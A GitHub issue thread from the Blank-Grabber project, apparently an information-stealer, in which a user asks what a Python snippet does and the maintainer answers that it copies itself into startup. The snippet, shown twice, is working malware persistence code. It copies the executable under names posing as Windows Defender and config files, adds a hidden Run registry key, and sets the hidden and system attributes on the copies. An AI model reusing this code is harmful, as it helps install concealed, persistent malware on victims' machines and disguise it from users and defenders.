### ISSUE TITLE
What does this part of the code

### ISSUE THREAD

**Issue by CR1T1Cal-labs** [Blank-c/Blank-Grabber#25]
``` py
if not os.path.basename(os.path.normpath(sys.executable)) == "Startup" and not os.path.basename(os.path.normpath(sys.executable)) == "Windows":
                        BlankGrabber.copy('BlankGrabber', sys.executable, os.getenv('USERPROFILE')+"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/Defender.exe")
                        BlankGrabber.copy('BlankGrabber', sys.executable, "C:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/dconfig.exe")
                        BlankGrabber.copy('BlankGrabber', sys.executable, "C:/Windows/dcsconfig.exe")
                        os.system('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "Cloud" /t REG_SZ /F /D "C:/Windows/dcsconfig.exe"')
                        try:
                            os.system(f"attrib {os.getenv('USERPROFILE')}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/Defender.exe +h +s")
                            os.system("attrib C:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/dconfig.exe +h +s")
                            os.system("attrib C:/Windows/dcsconfig.exe +h +s")
```

**Comment by Blank-c** [comment]
> ```python
> if not os.path.basename(os.path.normpath(sys.executable)) == "Startup" and not os.path.basename(os.path.normpath(sys.executable)) == "Windows":
>                         BlankGrabber.copy('BlankGrabber', sys.executable, os.getenv('USERPROFILE')+"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/Defender.exe")
>                         BlankGrabber.copy('BlankGrabber', sys.executable, "C:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/dconfig.exe")
>                         BlankGrabber.copy('BlankGrabber', sys.executable, "C:/Windows/dcsconfig.exe")
>                         os.system('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "Cloud" /t REG_SZ /F /D "C:/Windows/dcsconfig.exe"')
>                         try:
>                             os.system(f"attrib {os.getenv('USERPROFILE')}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/Defender.exe +h +s")
>                             os.system("attrib C:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/dconfig.exe +h +s")
>                             os.system("attrib C:/Windows/dcsconfig.exe +h +s")
> ```

Checks if it is in startup folder, if not, it copies itself there
